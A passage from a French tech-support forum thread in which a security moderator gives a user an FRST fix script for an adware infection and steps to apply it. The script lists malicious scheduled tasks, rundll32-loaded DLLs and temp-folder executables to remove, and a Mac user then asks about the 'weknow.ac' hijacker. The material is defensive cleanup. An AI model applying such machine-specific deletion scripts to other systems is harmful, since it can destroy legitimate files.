2018-07-19 14:58 - 2018-07-19 14:58 - 000000582 _____ C:\Windows\Tasks\bkurxnfjbkncCyWtTVA.job
2018-01-22 16:51 - 2018-01-22 16:53 - 000000004 _____ () C:\ProgramData\lock.dat
Task: {00A1936D-EEFD-4176-ABBB-E6425670C6D8} - System32\Tasks\Windows\Recovery\Cleaner => C:\ProgramData\Iostream.exe <==== ATTENTION
Task: {4189F98B-606F-4953-A090-3F8D37127D3F} - System32\Tasks\EvKXYuYInJXlleexbYg2 => rundll32 "C:\Program Files (x86)\vAVllEsAxeMRC\IBARprl.dll",#1
Task: {457C7768-A9F2-40C9-B907-7142F5E93886} - System32\Tasks\bkuVrSoFzVeDzcgajQl => C:\Windows\TEMP\hQDWmWVpnOvKDNBU\sdIatVRKTntrbRBR.exe [2018-08-01] () <==== ATTENTION
Task: {89EFF890-2113-40BE-A152-1F01F5B2A17D} - System32\Tasks\wfZrWIrMEiXDV2 => C:\Windows\system32\wscript.exe "C:\ProgramData\ruUERgYWnrtcTwVB\ZjcmZiT.wsf"
Task: {925DD632-863A-4B16-9BD8-7DFBF518E6E4} - System32\Tasks\MiaJIZLUajkEvTX2 => rundll32 "C:\Program Files (x86)\LiQGRolFU\EAUZNN.dll",#1
Task: {E7AE7A5D-959D-4E15-B8F1-D19E858A2AE3} - System32\Tasks\bkurxnfjbkncCyWtTVA => C:\Windows\Temp\izonGixAMhwjZSpQ\SjhBORxnX.exe <==== ATTENTION
Task: {E8844BA7-94A0-4D5F-BCB5-11161D6CB07A} - System32\Tasks\RDfwCHqJnQLcEr => rundll32 "C:\Program Files (x86)\IgweFKpaQOnU2\XEsAwUOZoNzND.dll",#1
Task: {F0780A87-BE03-430E-AEA5-9D705CB8D7F9} - System32\Tasks\jgDGwhQGSSLEOdmxV2 => rundll32 "C:\Program Files (x86)\IqlBbhRYjTsSntVgEiR\TDGlKDA.dll",#1
Task: {F0EE2364-0302-4A56-94A3-CE5BDE885B21} - System32\Tasks\Larri Beach => C:\Windows\system32\rundll32.exe "C:\Program Files\Larri Beach\Larri Beach.dll",YbdXSxhJAur <==== ATTENTION
Task: C:\Windows\Tasks\bkurxnfjbkncCyWtTVA.job => C:\Windows\Temp\izonGixAMhwjZSpQ\SjhBORxnX.exe <==== ATTENTION
Task: C:\Windows\Tasks\bkuVrSoFzVeDzcgajQl.job => C:\Windows\TEMP\hQDWmWVpnOvKDNBU\sdIatVRKTntrbRBR.exe <==== ATTENTION
C:\ProgramData\Iostream.exe
C:\Program Files (x86)\vAVllEsAxeMRC
C:\Windows\TEMP\hQDWmWVpnOvKDNBU
C:\ProgramData\ruUERgYWnrtcTwVB
C:\Program Files (x86)\LiQGRolFU
C:\Windows\Temp\izonGixAMhwjZSpQ
C:\Program Files (x86)\IgweFKpaQOnU2
C:\Program Files (x86)\IqlBbhRYjTsSntVgEiR
C:\Program Files\Larri Beach
C:\Windows\Temp\izonGixAMhwjZSpQ
C:\Windows\TEMP\hQDWmWVpnOvKDNBU
RemoveProxy:
EmptyTemp:
Reboot:

2- Dans le bloc-note clique sur Fichier puis sur Enregistrer ferme le bloc-note.
3- Revient dans FRST qui est ouvert, clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Reinitialise tes navigateurs internet : https://www.commentcamarche.com/faq/26679-reinitialiser-son-navigateur
6- Vérifie et dis-moi si ton problème est toujours présent.
7- termine avec un nettoyage avec NOD32 online voir cette page
Shadoowzz
Messages postés
2
Date d'inscription
mercredi 1 août 2018
Statut
Membre
Dernière intervention
2 août 2018
> bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
-
Merciii ça a marchéé
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Tu ne m'a pas communiqué le fixlog comme demandé, mais vu que tu me dis que ça a marché, je considère que c'est bon.
Bonne journée !
Commenter la réponse de Shadoowzz
0
Merci
Bonsoir,

J'ai un mac et pense avoir le même problème que ci-dessus. L'extension "weknow.ac" a été installée sur mon mac. j'ai supprimé l'extension, les fichiers etc mais lorsque je j'ouvre un nouvel onglet j'ai toujours une page inconnue et non plus le nouvel onglet chrome classique avec les sites visités.

Une solution pour moi ? j'ai essayé de télécharger FRST mais ça n'est que pour windows...

Merci beaucoup !
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Il n'y a pas d'outils spécialisés comme FRST pour Mac, voici quelques solutions sur cette page.
Commenter la réponse de greg